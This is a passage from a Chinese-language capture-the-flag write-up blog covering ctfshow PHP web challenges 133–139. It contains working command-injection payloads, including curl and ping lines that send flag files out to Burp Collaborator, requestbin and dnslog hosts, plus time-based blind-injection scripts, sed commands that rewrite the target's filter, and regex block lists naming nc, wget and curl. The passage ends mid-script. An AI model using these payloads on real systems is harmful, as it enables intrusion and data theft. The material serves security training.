<\/p>\n<\/blockquote>\n<p>\u9996\u5148\u662f\u60f3\u5c06\u5176\u5199\u5165\u6587\u4ef6\uff0c\u4f46\u662f\u8c8c\u4f3c\u6ca1\u6709\u8bfb\u5199\u6743\u9650\uff0c\u800c\u4e14\u6267\u884c\u7ed3\u679c\u4e0d\u56de\u663e\u3002\u3002\u3002<\/p>\n<p>\u56e0\u4e3a\u83dc\u9e21\uff0c\u6240\u4ee5\u770b\u5e08\u5085\u4eec\u7684wp\uff1a<\/p>\n<h2>Firebasky\u5e08\u5085\u7684\u9884\u671f\u89e3<\/h2>\n<p>\u8fd9\u91cc\u5229\u7528\u53d8\u91cf\u8986\u76d6\u8df3\u51fa\u4e86\u547d\u4ee4\u5b57\u6570\u7684\u9650\u5236\uff1a<\/p>\n<pre><code class=\"language-php\">\/?F=`$F`;+<\/code><\/pre>\n<p>\u53d8\u91cfF\u7684\u524d\u516d\u4e2a\u5b57\u7b26\u5c31\u662f\u6267\u884c$F(\u4e24\u4e2a\u53cd\u5f15\u53f7\u662f<code>shell_exec()<\/code>\u7684\u7f29\u5199)\uff0c\u7b2c\u4e8c\u6b21\u6267\u884cF\u7684\u65f6\u5019\u5c31\u4e0d\u7528\u622a\u53d6\u4e86\uff0c\u53ef\u4ee5\u5168\u90e8\u6267\u884c\uff01\uff01\uff01\u771ftm\u725b\u903c\u8fd9\u4e2a\u601d\u8def\uff01\uff01\uff01<\/p>\n<p>\u7136\u540e\u4f7f\u7528bp\u81ea\u5e26\u7684<code>Collaborator Client<\/code>\u6a21\u5757\u5e26\u51fa\u76f8\u5173flag\uff01\uff01\uff01<\/p>\n<blockquote>\n<p>curl -F \u5c06flag\u6587\u4ef6\u4e0a\u4f20\u5230Burp\u7684 Collaborator Client \uff08 Collaborator Client \u7c7b\u4f3cDNSLOG\uff0c\u5176\u529f\u80fd\u8981\u6bd4DNSLOG\u5f3a\u5927\uff0c\u4e3b\u8981\u4f53\u73b0\u5728\u53ef\u4ee5\u67e5\u770b POST\u8bf7\u6c42\u5305\u4ee5\u53ca\u6253Cookies\uff09<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248622.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248622.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221007204130922\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248624.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248624.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221007204226477\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>copy\u4e00\u4e0b\u7f51\u7ad9\uff0c\u6784\u9020payload\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-php\">?F=`$F`;+curl -X POST -F xx=@flag.php  http:\/\/kk8qqd6bu9q5tl8vbzvxj8u8dzjr7g.burpcollaborator.net<\/code><\/pre>\n<p>\u53d1\u9001\u8fc7\u53bb\u4ee5\u540e<code>poll now<\/code>\u5237\u65b0\u4e00\u4e0b\uff0c\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248625.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248625.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221007204427037\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e5f\u53ef\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\uff1a<a href=\"https:\/\/requestbin.net\/\">RequestBin - The next generation<\/a><\/p>\n<p><a href=\"http:\/\/ceye.io\/\">http:\/\/ceye.io\/<\/a><\/p>\n<h2>\u7fbd\u5e08\u5085\u89e3\u6cd5<\/h2>\n<pre><code>?F=`$F`;+curl  http:\/\/requestbin.net\/r\/1puo0jq1?p=`cat test.php`\n?F=`$F`;+curl  http:\/\/requestbin.net\/r\/1puo0jq1?p=`cat test2.php|grep flag`<\/code><\/pre>\n<h2>\u5927\u5e08\u5085\u89e3<\/h2>\n<p>\u4f7f\u7528<code>dnslog.cc<\/code><\/p>\n<pre><code class=\"language-php\">?F=`$F`; ping `cat flag.php | grep ctfshow | tr -cd &#039;[a-z]&#039;\/&#039;[0-9]&#039;`.3sybbi.dnslog.cn -c 1<\/code><\/pre>\n<p>\u5f97\u5230flag\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248626.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248626.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221007211622633\" \/><\/div><\/p>\n<p>\u4f46\u662f\u8fd8\u9700\u8981\u6539\u4e00\u4e0b\u76f8\u5173\u683c\u5f0f\uff0cctfshow\u7684\u683c\u5f0f\u90fd\u662f\u6309\u7167<code>8-4-4-4-12<\/code>\u641e\u7684\uff0c\u6539\u4e00\u4e0b\u5373\u53ef\uff01\uff01\uff01<\/p>\n<h2>Y1ng\u5e08\u5085\u811a\u672c<\/h2>\n<pre><code class=\"language-python\">#!\/usr\/bin\/env python3\n#-*- coding:utf-8 -*-\n#__author__: \u9896\u5947L&#039;Amore www.gem-love.com\n\nimport requests\nimport time as t\nfrom urllib.parse import quote as urlen\nurl  = &#039;http:\/\/a33fd7ba-f040-4f81-9e92-15b6f919b839.challenge.ctf.show\/?F=`$F%20`;&#039;\nalphabet = [&#039;{&#039;,&#039;}&#039;, &#039;.&#039;, &#039;@&#039;, &#039;-&#039;,&#039;_&#039;,&#039;=&#039;,&#039;a&#039;,&#039;b&#039;,&#039;c&#039;,&#039;d&#039;,&#039;e&#039;,&#039;f&#039;,&#039;j&#039;,&#039;h&#039;,&#039;i&#039;,&#039;g&#039;,&#039;k&#039;,&#039;l&#039;,&#039;m&#039;,&#039;n&#039;,&#039;o&#039;,&#039;p&#039;,&#039;q&#039;,&#039;r&#039;,&#039;s&#039;,&#039;t&#039;,&#039;u&#039;,&#039;v&#039;,&#039;w&#039;,&#039;x&#039;,&#039;y&#039;,&#039;z&#039;,&#039;A&#039;,&#039;B&#039;,&#039;C&#039;,&#039;D&#039;,&#039;E&#039;,&#039;F&#039;,&#039;G&#039;,&#039;H&#039;,&#039;I&#039;,&#039;J&#039;,&#039;K&#039;,&#039;L&#039;,&#039;M&#039;,&#039;N&#039;,&#039;O&#039;,&#039;P&#039;,&#039;Q&#039;,&#039;R&#039;,&#039;S&#039;,&#039;T&#039;,&#039;U&#039;,&#039;V&#039;,&#039;W&#039;,&#039;X&#039;,&#039;Y&#039;,&#039;Z&#039;,&#039;0&#039;,&#039;1&#039;,&#039;2&#039;,&#039;3&#039;,&#039;4&#039;,&#039;5&#039;,&#039;6&#039;,&#039;7&#039;,&#039;8&#039;,&#039;9&#039;]\n\nresult = &#039;&#039;\nfor i in range(1,50):\n    for char in alphabet:\n        # payload = &quot;if [ `ls  | grep &#039;flag&#039; |cut -c{}` = &#039;{}&#039; ];then sleep 5;fi&quot;.format(i,char) #flag.php\n        payload = &quot;if [ `cat flag.php | grep &#039;flag&#039; |cut -c{}` = &#039;{}&#039; ];then sleep 5;fi&quot;.format(i,char)\n        # data = {&#039;cmd&#039;:payload}\n        try:\n            start = int(t.time())\n            r = requests.get(url+payload)\n            # r = requests.post(url, data=data)\n            end = int(t.time()) - start\n            if end &gt;= 3:     \n                result += char\n                print(&quot;Flag: &quot;+result)\n                break\n        except Exception as e:\n            print(e)<\/code><\/pre>\n<p>\u6211\u6ca1\u8fd0\u884c\u51fa\u6765\uff0c\u5728\u8fd9\u91cc\u5148\u653e\u7740\uff0c\u4e0b\u6b21\u91cd\u505a\u7684\u65f6\u5019\u518d\u8003\u8651<\/p>\n<h2>Hint<\/h2>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_46091464\/article\/details\/109095382\">https:\/\/blog.csdn.net\/qq_46091464\/article\/details\/109095382<\/a><\/p>\n<h2>\u6df1\u5165\u5b66\u4e60<\/h2>\n<p><a href=\"https:\/\/www.cnblogs.com\/afanti\/p\/8047530.html\">https:\/\/www.cnblogs.com\/afanti\/p\/8047530.html<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/whatday\/article\/details\/107862031\">https:\/\/blog.csdn.net\/whatday\/article\/details\/107862031<\/a><\/p>\n<h1>web134<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nhighlight_file(__FILE__);\n$key1 = 0;\n$key2 = 0;\nif(isset($_GET[&#039;key1&#039;]) || isset($_GET[&#039;key2&#039;]) || isset($_POST[&#039;key1&#039;]) || isset($_POST[&#039;key2&#039;])) {\n    die(&quot;nonononono&quot;);\n}\n@parse_str($_SERVER[&#039;QUERY_STRING&#039;]);\nextract($_POST);\nif($key1 == &#039;36d&#039; &amp;&amp; $key2 == &#039;36d&#039;) {\n    die(file_get_contents(&#039;flag.php&#039;));\n}<\/code><\/pre>\n<blockquote>\n<p><strong>\u5b9a\u4e49\u548c\u7528\u6cd5<\/strong><\/p>\n<p>parse_str() \u51fd\u6570\u628a\u67e5\u8be2\u5b57\u7b26\u4e32\u89e3\u6790\u5230\u53d8\u91cf\u4e2d\u3002<\/p>\n<p><strong>\u6ce8\u91ca\uff1a<\/strong>\u5982\u679c\u672a\u8bbe\u7f6e array \u53c2\u6570\uff0c\u7531\u8be5\u51fd\u6570\u8bbe\u7f6e\u7684\u53d8\u91cf\u5c06\u8986\u76d6\u5df2\u5b58\u5728\u7684\u540c\u540d\u53d8\u91cf\u3002<\/p>\n<p><strong>\u6ce8\u91ca\uff1a<\/strong>php.ini \u6587\u4ef6\u4e2d\u7684 magic_quotes_gpc \u8bbe\u7f6e\u5f71\u54cd\u8be5\u51fd\u6570\u7684\u8f93\u51fa\u3002\u5982\u679c\u5df2\u542f\u7528\uff0c\u90a3\u4e48\u5728 parse_str() \u89e3\u6790\u4e4b\u524d\uff0c\u53d8\u91cf\u4f1a\u88ab addslashes() \u8f6c\u6362\u3002<\/p>\n<hr \/>\n<p><strong>\u8bed\u6cd5<\/strong><\/p>\n<p>parse_str(<em>string,array<\/em>)<\/p>\n<ul>\n<li>string   \u5fc5\u9700\u3002\u89c4\u5b9a\u8981\u89e3\u6790\u7684\u5b57\u7b26\u4e32\u3002                   <\/li>\n<li>array \u53ef\u9009\u3002\u89c4\u5b9a\u5b58\u50a8\u53d8\u91cf\u7684\u6570\u7ec4\u540d\u79f0\u3002\u8be5\u53c2\u6570\u6307\u793a\u53d8\u91cf\u5b58\u50a8\u5230\u6570\u7ec4\u4e2d\u3002 <\/li>\n<\/ul>\n<\/blockquote>\n<p>\u4e0d\u5141\u8bb8get\u4ee5\u53capost\u76f4\u63a5\u63d0\u4ea4\u53c2\u6570\uff0c\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-php\">\/?_POST[key1]=36d&amp;_POST[key2]=36d<\/code><\/pre>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">\u8003\u5bdf\uff1a php\u53d8\u91cf\u8986\u76d6 \u5229\u7528\u70b9\u662f extract($_POST); \u8fdb\u884c\u89e3\u6790$_POST\u6570\u7ec4\u3002 \u5148\u5c06GET\u65b9\u6cd5\u8bf7\u6c42\u7684\u89e3\u6790\u6210\u53d8\u91cf\uff0c\u7136\u540e\u5728\u5229\u7528extract() \u51fd\u6570\u4ece\u6570\u7ec4\u4e2d\u5c06\u53d8\u91cf\u5bfc\u5165\u5230\u5f53\u524d\u7684\u7b26\u53f7\u8868\u3002 \u6240\u4ee5payload: ?_POST[key1]=36d&amp;_POST[key2]=36d<\/code><\/pre>\n<h1>web135<\/h1>\n<pre><code class=\"language-text\">web133plus<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\n\/\/flag.php\nif($F = @$_GET[&#039;F&#039;]){\n    if(!preg_match(&#039;\/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head\/i&#039;, $F)){\n        eval(substr($F,0,6));\n    }else{\n        die(&quot;\u5e08\u5085\u4eec\u5c45\u7136\u7834\u89e3\u4e86\u524d\u9762\u7684\uff0c\u90a3\u5c31\u6765\u4e00\u4e2a\u52a0\u5f3a\u7248\u5427&quot;);\n    }\n}<\/code><\/pre>\n<p>\u5148\u5c06flag\u5199\u5165\u4e34\u65f6\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-php\">\/?F=`$F`;nl   flag.php&gt;\/tmp\/1<\/code><\/pre>\n<p>dnslog\u8bfb\u53d6\u6587\u4ef6\u5916\u5e26\u51fa\u6765\uff1a<\/p>\n<pre><code class=\"language-php\">\/?F=`$F`;+ping `nl flag.php|awk &#039;NR==15&#039;|tr -cd &quot;[a-z]&quot;\/&quot;[0-9]&quot;`.takge5.dnslog.cn\n\/?F=`$F`;+ping `nl flag.php|awk &#039;NR==16&#039;|tr -cd &quot;[a-z]&quot;\/&quot;[0-9]&quot;`.takge5.dnslog.cn<\/code><\/pre>\n<p>\u5206\u522b\u8bfb\u53d6\u4e8615\u300116\u884c\u6570\u636e\uff0c\u5408\u5e76\u63d0\u4ea4\u5373\u53ef\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248627.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202210082248627.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20221007215519997\" \/><\/div><\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">`$F`;+ping `cat flag.php|awk &#039;NR==2&#039;`.6x1sys.dnslog.cn\n#\u901a\u8fc7ping\u547d\u4ee4\u53bb\u5e26\u51fa\u6570\u636e\uff0c\u7136\u540eawk NR\u4e00\u6392\u4e00\u6392\u7684\u83b7\u5f97\u6570\u636e<\/code><\/pre>\n<h1>web136<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nfunction check($x){\n    if(preg_match(&#039;\/\\\\$|\\.|\\!|\\@|\\#|\\%|\\^|\\&amp;|\\*|\\?|\\{|\\}|\\&gt;|\\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp\/i&#039;, $x)){\n        die(&#039;too young too simple sometimes naive!&#039;);\n    }\n}\nif(isset($_GET[&#039;c&#039;])){\n    $c=$_GET[&#039;c&#039;];\n    check($c);\n    exec($c);\n}\nelse{\n    highlight_file(__FILE__);\n}\n?&gt;<\/code><\/pre>\n<h2>\u65b9\u6cd5\u4e00\uff1atee\u547d\u4ee4<\/h2>\n<blockquote>\n<p>tee\u547d\u4ee4\u7684\u4f5c\u7528\u5c31\u662f\u8bfb\u53d6\u6807\u51c6\u8f93\u5165\u5185\u5bb9\uff0c\u5c06\u8bfb\u53d6\u5230\u7684\u6570\u636e\u5199\u5230\u6807\u51c6\u8f93\u51fa\u548c\u6587\u4ef6\u3002\u5e94\u7528\u573a\u666f\u4e00\u5c31\u662f\u6709\u65f6\u5019\u6211\u4eec\u5e0c\u671b\u64cd\u4f5c\u547d\u4ee4\u65e2\u663e\u793a\u5230\u5c4f\u5e55\u53c8\u4fdd\u5b58\u5230\u6587\u6863\uff0ctee\u547d\u4ee4\u662f\u6211\u4eec\u7684\u4e0d\u4e8c\u9009\u62e9\uff1b\u5e94\u7528\u573a\u666f\u4e8c\u662f\u91cd\u590d\u5c55\u793a\u8f93\u5165\u5185\u5bb9\uff1b\u5e94\u7528\u573a\u666f\u4e09\u662f\u53ef\u4ee5\u5c06\u6587\u4ef6\u540c\u65f6\u590d\u5236\u591a\u4efd\u3002\u5f53\u7136tee\u547d\u4ee4\u8fd8\u53ef\u4ee5\u4e0e\u5176\u4ed6\u547d\u4ee4\u7ed3\u5408\u4f7f\u7528\uff0c\u7ec4\u5408\u8fbe\u5230\u6211\u4eec\u671f\u5f85\u7684\u6548\u679c\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-php\">\/?c=ls \/|tee 1\n# \u5c06\u76ee\u5f55\u5217\u4e3e\u51fa\u6765\u653e\u52301\u6587\u4ef6\u4e2d\uff0c\u7136\u540e\u8bbf\u95ee\u4e0b\u8f7d\u6587\u4ef6\u67e5\u770b\u3002<\/code><\/pre>\n<p>\u67e5\u770b\u76ee\u5f55\u7ed3\u6784\uff1a<\/p>\n<pre><code class=\"language-text\">bin dev etc f149_15_h3r3 home lib media mnt opt proc root run sbin srv sys tmp usr var<\/code><\/pre>\n<p>\u627e\u5230flag\u6587\u4ef6\uff0c\u518d\u6b21\u8f93\u51fa\u5230\u6587\u4ef6\u4e2d\uff0c\u5229\u7528tee\u547d\u4ee4\u8fdb\u884c\u5f39\u51fa\u3002<\/p>\n<pre><code class=\"language-php\">\/?c=cat \/f149_15_h3r3|tee 2<\/code><\/pre>\n<p>\u6253\u5f002\u6587\u4ef6\uff0c\u5f97\u5230flag\uff01\uff01\uff01<\/p>\n<h2>\u65b9\u6cd5\u4e8c\uff1a\u5927\u5e08\u5085\u5f0f\u9a9a\u65b9\u6cd5<\/h2>\n<p>\u5927\u81f4\u601d\u8def\u662f\u901a\u8fc7php\u5c06\u81ea\u8eabwaf\u79fb\u9664\uff1a<\/p>\n<pre><code class=\"language-php\">\/?c=ls |xargs sed -i &#039;s\/die\/echo\/&#039;\n\/?c=ls |xargs sed -i &#039;s\/exec\/system\/&#039;<\/code><\/pre>\n<p>\u8bbf\u95ee\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u4ee3\u7801\u53d8\u4e86\uff01\uff01\uff01\uff01woc\uff01\uff01\uff01\u5927\u5e08\u5085yyds<\/p>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nfunction check($x){\n    if(preg_match(&#039;\/\\\\$|\\.|\\!|\\@|\\#|\\%|\\^|\\&amp;|\\*|\\?|\\{|\\}|\\&gt;|\\&lt;|nc|wget|system|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp\/i&#039;, $x)){\n        echo(&#039;too young too simple sometimes naive!&#039;);\n    }\n}\nif(isset($_GET[&#039;c&#039;])){\n    $c=$_GET[&#039;c&#039;];\n    check($c);\n    system($c);\n}\nelse{\n    highlight_file(__FILE__);\n}\n?&gt;<\/code><\/pre>\n<p>nb\uff01\uff01\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">\/?c=cat \/f149_15_h3r3<\/code><\/pre>\n<p>\u5f97\u5230flag\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\"> payload: ls \/|tee 1 \u8bbf\u95ee1\u4e0b\u8f7d\u53d1\u73b0\u6839\u76ee\u5f55\u4e0b\u6709flag payload: cat \/f149_15_h3r3|tee 2 \u8bbf\u95ee\u4e0b\u8f7d\u5c31OK<\/code><\/pre>\n<h1>web137<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nhighlight_file(__FILE__);\nclass ctfshow\n{\n    function __wakeup(){\n        die(&quot;private class&quot;);\n    }\n    static function getFlag(){\n        echo file_get_contents(&quot;flag.php&quot;);\n    }\n}\ncall_user_func($_POST[&#039;ctfshow&#039;]);<\/code><\/pre>\n<p>\u4f7f\u7528<code>call_user_func<\/code>\u53ef\u4ee5\u8c03\u7528\u65e0\u53c2\u51fd\u6570\uff0c\u5c1d\u8bd5\uff1a<\/p>\n<pre><code class=\"language-php\">POST:ctfshow=phpinfo<\/code><\/pre>\n<p>\u53ef\u4ee5\u53d1\u73b0\u8c03\u7528\u6210\u529f\uff01\uff01\uff01<\/p>\n<p>\u76f4\u63a5\u8c03\u7528ctfshow\u7684\u9759\u6001\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-php\">ctfshow=ctfshow::getFlag<\/code><\/pre>\n<h2>\u8865\u5145\uff1a\u8c03\u7528\u52a8\u6001\u65b9\u6cd5<\/h2>\n<p>\u5047\u5982getFlag\u4e3a\u52a8\u6001\u65b9\u6cd5\uff1a<\/p>\n<pre><code class=\"language-php\">ctfshow=call_user_func_array(array(new ctfshow(),`getFlag`),args)<\/code><\/pre>\n<h2>Hint<\/h2>\n<p>\u8003\u5bdf\uff1a call_user_func()\u51fd\u6570\u7684\u4f7f\u7528 <a href=\"https:\/\/www.php.net\/manual\/zh\/function.call-user-func.php\">https:\/\/www.php.net\/manual\/zh\/function.call-user-func.php<\/a><\/p>\n<pre><code class=\"language-php\">payload: POST: ctfshow=ctfshow::getFlag<\/code><\/pre>\n<h1>web138<\/h1>\n<pre><code class=\"language-php\">&lt;?php\n\n    error_reporting(0);\nhighlight_file(__FILE__);\nclass ctfshow\n{\n    function __wakeup(){\n        die(&quot;private class&quot;);\n    }\n    static function getFlag(){\n        echo file_get_contents(&quot;flag.php&quot;);\n    }\n}\n\nif(strripos($_POST[&#039;ctfshow&#039;], &quot;:&quot;)&gt;-1){\n    die(&quot;private function&quot;);\n}\n\ncall_user_func($_POST[&#039;ctfshow&#039;]);<\/code><\/pre>\n<p>\u8fd9\u91cc\u4e0d\u51c6\u4f7f\u7528<code>:<\/code>\uff0c\u6ca1\u529e\u6cd5\u53ea\u80fd\u770b\u5b98\u65b9\u6587\u6863\u4e86\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-php\">&lt;?php\nnamespace Foobar;\nclass Foo {\n    static public function test() {\n        print &quot;Hello world!\\n&quot;;  \n    }\n}\ncall_user_func(__NAMESPACE__ .&#039;\\Foo::test&#039;);\ncall_user_func(array(__NAMESPACE__ .&#039;\\Foo&#039;, &#039;test&#039;));\n?&gt;<\/code><\/pre>\n<p>\u4ee5\u4e0a\u4f8b\u7a0b\u4f1a\u8f93\u51fa\uff1a<\/p>\n<pre><code>Hello world!\nHello world!<\/code><\/pre>\n<p>\u8bf4\u660e\u4f20\u5165\u5982\u679c\u662f\u6570\u7ec4\uff0c\u5219\u4e0e<code>\uff1a<\/code>\u6709\u4e00\u6837\u7684\u6548\u679c\uff01\uff01\uff01\uff01<\/p>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code class=\"language-php\">ctfshow[]=ctfshow&amp;ctfshow[1]=getFlag<\/code><\/pre>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\u5f97\u5230flag\uff01\uff01\uff01\uff01<\/p>\n<h2>Hint<\/h2>\n<pre><code class=\"language-php\">payload:\nPOST: ctfshow[0]=ctfshow&amp;ctfshow[1]=getFlag<\/code><\/pre>\n<h1>web139<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nerror_reporting(0);\nfunction check($x){\n    if(preg_match(&#039;\/\\\\$|\\.|\\!|\\@|\\#|\\%|\\^|\\&amp;|\\*|\\?|\\{|\\}|\\&gt;|\\&lt;|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp\/i&#039;, $x)){\n        die(&#039;too young too simple sometimes naive!&#039;);\n    }\n}\nif(isset($_GET[&#039;c&#039;])){\n    $c=$_GET[&#039;c&#039;];\n    check($c);\n    exec($c);\n}\nelse{\n    highlight_file(__FILE__);\n}\n?&gt;<\/code><\/pre>\n<p>\u672c\u9898\u8fc7\u6ee4\u6389\u4e86\u5927\u90e8\u5206\u83b7\u53d6flag\u7684\u51fd\u6570\uff0c\u4e14\u4e0d\u56de\u663e\uff0c\u53ea\u80fd\u5c1d\u8bd5\u76f2\u6ce8\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-php\">\/?c=sleep 3<\/code><\/pre>\n<p>\u53ef\u4ee5\u89c2\u5bdf\u5230\u786e\u5b9e\u662f\u4f11\u7720\u4e863s\uff0c\u4e0b\u9762\u8981\u4ece\u8fd9\u4e9b\u547d\u4ee4\u5165\u624b\uff1a<\/p>\n<pre><code class=\"language-bash\">ls \/ -1\n# \u5c06ls\u4e0b\u7684\u6839\u76ee\u5f55\u7eb5\u5411\u6392\u5217\nls \/ -1 | awk &quot;NR==1&quot;\n# \u8f93\u51fa\u884c\u53f7\u4e3a1\u7684\u9879\nls \/ -1 | awk &quot;NR==1&quot; | cut -c 1\n# \u5c06\u884c\u53f7\u4e3a\u4e00\u7684\u9879\u7684\u7b2c\u4e00\u4e2a\u5b57\u6bcd\u8f93\u51fa\nif [ `ls \/ -1 | cut -c 1 | awk &quot;NR==1&quot;` == b ];then sleep 3;fi\n# \u6838\u5fc3\u547d\u4ee4<\/code><\/pre>\n<p>\u6839\u636e\u4e0a\u9762\u7684\u547d\u4ee4\u7f16\u5199\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">import requests\n\nurl = &quot;http:\/\/98e8dae5-2d9a-4346-bdb2-f1cfbe319546.challenge.ctf.show\/?c=&quot;\npayload = &quot;if [ `ls \/ -1 | cut -c {} | awk \\&quot;NR=={}\\&quot;` == \\&quot;{}\\&quot; ];then sleep 3;fi&quot;\n\nresult = &quot;&quot;\n\nrow = 5\nlength = 20\n\nstrings = &quot;abcdefghijklmnopqrstuvwxyz_-0123456789&quot;\n\nfor i in range(1,row):\n    for j in range(1,length):\n        for m in strings:\n            target = url + payload.format(i,j,m)\n            print(target)\n            try:\n                requests.get(target,timeout=2.5)\n            except:\n                result += m\n                print(result)\n                break\n    result += &quot; 